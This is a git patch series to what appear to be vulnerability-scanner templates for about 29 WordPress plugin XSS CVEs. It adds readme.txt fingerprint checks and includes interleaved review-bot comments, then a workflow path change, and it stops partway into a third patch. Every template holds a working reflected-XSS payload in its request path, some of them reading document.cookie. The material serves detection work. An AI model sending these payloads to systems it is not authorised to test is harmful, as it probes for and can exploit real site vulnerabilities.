From c68dd7249c10c808eb84bd814a7b3086d98c4491 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Thu, 21 Mar 2024 13:25:50 +0530 Subject: [PATCH 1/7] Wordpress FP Fix --- http/cves/2008/CVE-2008-1061.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-4624.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-4926.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5179.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5181.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5265.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-1835.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-2371.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-4242.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-4273.yaml | 15 +++++++++++++++ http/cves/2012/CVE-2012-4768.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-5913.yaml | 13 +++++++++++++ http/cves/2013/CVE-2013-2287.yaml | 15 +++++++++++++++ http/cves/2013/CVE-2013-3526.yaml | 19 +++++++++++++++++-- http/cves/2013/CVE-2013-4117.yaml | 13 +++++++++++++ http/cves/2013/CVE-2013-4625.yaml | 13 +++++++++++++ http/cves/2014/CVE-2014-4513.yaml | 13 +++++++++++++ http/cves/2014/CVE-2014-4536.yaml | 16 ++++++++++++++++ http/cves/2014/CVE-2014-4539.yaml | 15 +++++++++++++++ http/cves/2014/CVE-2014-4561.yaml | 15 +++++++++++++++ http/cves/2014/CVE-2014-9094.yaml | 13 +++++++++++++ http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 15 +++++++++++++++ http/cves/2015/CVE-2015-4127.yaml | 13 +++++++++++++ http/cves/2015/CVE-2015-6920.yaml | 16 ++++++++++++++++ http/cves/2015/CVE-2015-9414.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000126.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000127.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000128.yaml | 15 +++++++++++++++ 29 files changed, 389 insertions(+), 3 deletions(-) diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 01fb93065e7..252a27d5194 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml 
@@ -30,7 +30,20 @@ info: product: sniplets_plugin tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Code Snippets' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 0b418552a92..bbb262d5798 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/flash-album-gallery" tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Grand Flagallery' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index ebd2ba8c1f3..b53a51b106f 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Adminimize ===' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 
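Review bot: The new readme pre-check in `http(1)` decides on body text alone, with no status matcher, so a host that answers unknown paths with a 200 catch-all page (or a WAF/cache page) that happens to contain the word still passes the fingerprint, and a 404 body quoting the plugin name could as well; pair the word matcher with a status matcher, both marked `internal: true`, under `matchers-condition: and` so the flow only proceeds on a real readme. The same request block is repeated verbatim in every other hunk of this patch (CVE-2011-4624 through CVE-2016-1000128) and in PATCH 3/7 (CVE-2016-1000129 through CVE-2016-1000138), so the change applies there as well.
```yaml
    matchers-condition: and
    matchers:
      - type: status
        internal: true
        status:
          - 200
      # … unchanged: the existing internal word matcher …
```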
diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 2a29fe6feaf..1970e394ca8 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/skysa-official/" tags: cve,cve2011,wordpress,xss,wp-plugin,skysa +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Skysa App' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index c270e00d5b2..eec44867529 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'ClickDesk Live Support - Live Chat' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 526dd0b561d..2ffa04fca58 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml 
@@ -27,7 +27,20 @@ info: google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Featurific For Wordpress' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 30d6376993f..9df25691ce6 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,timely +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'All-in-One Event Calendar' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 3bbd9f4e282..f51ab64d4cc 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -29,7 +29,20 @@ info: product: wp-facethumb tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP-FaceThumb ===' + - method: GET path: - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 
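Review bot: The fingerprint word `'Featurific For Wordpress'` in the CVE-2011-5265 hunk is matched case-sensitively (no `case-insensitive: true`, unlike the CVE-2014-4536 and CVE-2015-6920 hunks later in this patch), so if the shipped readme.txt spells the name `WordPress` the pre-check never matches and the template stops firing on every host — an FP fix that turns into a silent false negative. Confirm the exact header text of the plugin's readme before relying on it, or add `case-insensitive: true` to the matcher. The same concern applies to `'Wordpress Integrator'` in the CVE-2012-5913 hunk.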
diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 39e8de4496b..220149ffbbd 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -26,7 +26,20 @@ info: product: mf_gig_calendar tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'MF Gig Calendar =' + - method: GET path: - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 765440b1277..60f2bfa4600 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -30,7 +30,22 @@ info: google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '2 Click Social Media Buttons' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 2c1869e8f36..cfd7b0b9500 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml 
@@ -29,7 +29,20 @@ info: framework: wordpress tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Download Monitor =' + - method: GET path: - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 6a31eb58753..41d8a0e9d23 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -29,7 +29,20 @@ info: product: wordpress_integrator tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Wordpress Integrator' + - method: GET path: - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 62a581c8056..e457e6366d0 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -27,7 +27,22 @@ info: google-query: inurl:"/wp-content/plugins/uploader" tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/uploader/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Uploader' + - "Tags:" + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index a1f1ee49173..365c3e4f0d4 100644 
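Review bot: In the CVE-2013-2287 hunk the fingerprint effectively reduces to the single word `'Uploader'`, because `"Tags:"` appears in the header of every WordPress plugin readme and adds no discrimination; `Uploader` is generic enough to occur on a catch-all or error page, so this hunk keeps a false-positive path. Prefer the plugin's own `=== … ===` title line, taken verbatim from the shipped readme.txt rather than guessed, as the distinguishing word. The same weak pairing appears in the CVE-2015-2807 hunk (`'Navis'`) and in PATCH 3/7 for CVE-2016-1000130 and CVE-2016-1000131 (`'Search'`). Style: this hunk mixes `'Uploader'` with `"Tags:"`, while the rest of the series quotes words with single quotes throughout.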
--- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -29,17 +29,32 @@ info: google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'traffic analy' + - 'Tags:' + condition: and + - method: GET path: - - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - "" + - "" - type: word part: header diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index dd674d06dd2..cbb3992cb60 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Category Grid View Gallery =' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 80b13c89041..973fc41b3bf 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml 
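Review bot: The body matcher rewritten in the CVE-2013-3526 hunk reads as `- ""` in this rendering of the diff; if the committed value really is an empty string, a `word` matcher with an empty word is satisfied by every response body and the template's verdict then rests on the header matcher alone. Presumably the angle-bracket payload mirroring the new `alert(document.domain)` path was dropped by the page extraction, but the value in the file is worth confirming. A short comment above the matcher naming what the reflected string is would also make future renderings of this line unambiguous.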
@@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/duplicator" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Duplicator - WordPress Migration' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index ea24a1ca3b3..b26c389992b 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/activehelper-livehelp" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'ActiveHelper LiveHelp Live Chat' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 838be1d297c..44cc10d6c35 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml 
@@ -30,7 +30,23 @@ info: google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Infusionsoft' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 61660a52615..ffa4c553cab 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -28,7 +28,22 @@ info: framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/movies/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Movies =' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 47ff1013655..0714a0d867e 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml 
@@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate Weather' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index b679bf8c04c..9deb3e713d4 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/dzs-videogallery" tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Video Gallery WordPress DZS' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 1a2785e12d4..e073626ec90 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 99e09c93a49..5fccebee3ba 100644 --- a/http/cves/2015/CVE-2015-2807.yaml 
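Review bot: The pre-check request in the CVE-2014-9094 hunk fetches `/wp-content/plugins/dzs-videogallery/readme` without the `.txt` extension, unlike every other hunk in this patch; if that is a typo, `http(1)` never matches and the template silently stops reporting. If the plugin really ships an extensionless `readme`, a one-line comment above the request, e.g. `# plugin ships "readme" without .txt — not a typo`, would keep the next reviewer from "fixing" it. Separately, the exploit path this file keeps still uses `alert(1)` while the CVE-2013-3526 hunk in the same patch normalises to `alert(document.domain)`.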
+++ b/http/cves/2015/CVE-2015-2807.yaml @@ -31,7 +31,22 @@ info: google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Navis' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 4ec174e459c..facbffa56b2 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Church Admin =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 0ea24232ea7..7674754044d 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml 
@@ -27,7 +27,23 @@ info: framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SourceAfrica' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index a98f0519d8a..607cb28f098 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -31,7 +31,22 @@ info: google-query: inurl:"/wp-content/plugins/wp-symposium" tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Symposium' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 569ad75a862..66877a05a46 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml 
@@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Admin Font Editor' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 90f0e968eb7..ecfa30a8cc0 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -29,7 +29,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ajax Random Post' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 193a9fefad0..79635dec6c0 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -27,7 +27,22 @@ info: google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'anti plagiarism' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
From 2413b5c94682651a1573f0d6ebab303a6123bb35 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:37:40 +0530 Subject: [PATCH 2/7] misc workflow path update --- workflows/default-application-workflow.yaml | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml index 03b65efc242..c3ea77fcb14 100644 --- a/workflows/default-application-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -4,29 +4,18 @@ info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications + workflows: - template: http/technologies/apache/default-apache-test-all.yaml - - template: http/technologies/apache/xampp-default-page.yaml - - template: http/technologies/microsoft/default-iis7-page.yaml - - template: http/technologies/microsoft/default-windows-server-page.yaml - - template: http/technologies/microsoft/default-microsoft-azure-page.yaml - - template: http/technologies/default-asp-net-page.yaml - - template: http/technologies/nginx/default-nginx-page.yaml - - template: http/technologies/default-lighttpd-page.yaml - - template: http/technologies/default-django-page.yaml - - - template: http/exposures/files/drupal-install.yaml - + - template: http/misconfiguration/installer/drupal-install.yaml - template: http/technologies/oracle/default-oracle-application-page.yaml - - template: http/technologies/ibm/ibm-http-server.yaml - - template: http/technologies/default-detect-generic.yaml From ce3819840cf1550c964a896100be6910b8b68468 Mon Sep 17 